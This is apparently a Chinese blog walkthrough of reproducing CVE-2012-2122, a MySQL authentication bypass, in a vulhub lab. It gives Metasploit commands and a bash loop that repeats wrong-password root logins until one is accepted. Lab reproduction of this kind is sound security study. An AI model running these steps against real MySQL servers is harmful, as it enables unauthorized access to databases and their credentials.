vulhub-mysql漏洞复现

本文详细描述了如何在KaliLinux上使用Metasploit框架针对CentOS7系统中的CVE-2012-2122MySQL身份验证绕过漏洞进行攻击,包括设置靶机、执行exploit和获取数据库凭证的过程。
摘要由CSDN通过智能技术生成

靶机:centos7

攻击机:kali

进入mysql环境
cd vulhub
ls
cd mysql
cd CVE-2012-2122

在这里插入图片描述
攻击机:kali

进入:msfconsole
查找对应的漏洞:search CVE-2012-2122
使用:use 0

在这里插入图片描述

查看配置选项,yes为必填选项:show options/options
设置靶机ip:set rhost XXX
查看是否配置成功:show options

在这里插入图片描述

运行:run/exploit

在这里插入图片描述

获取数据库账户密码:for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.17.180(靶机IP) -P3306 ; done
验证:show databases;

在这里插入图片描述
参考链接:[MySql身份认证绕过漏洞(CVE-2012-2122)-CSDN博客]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值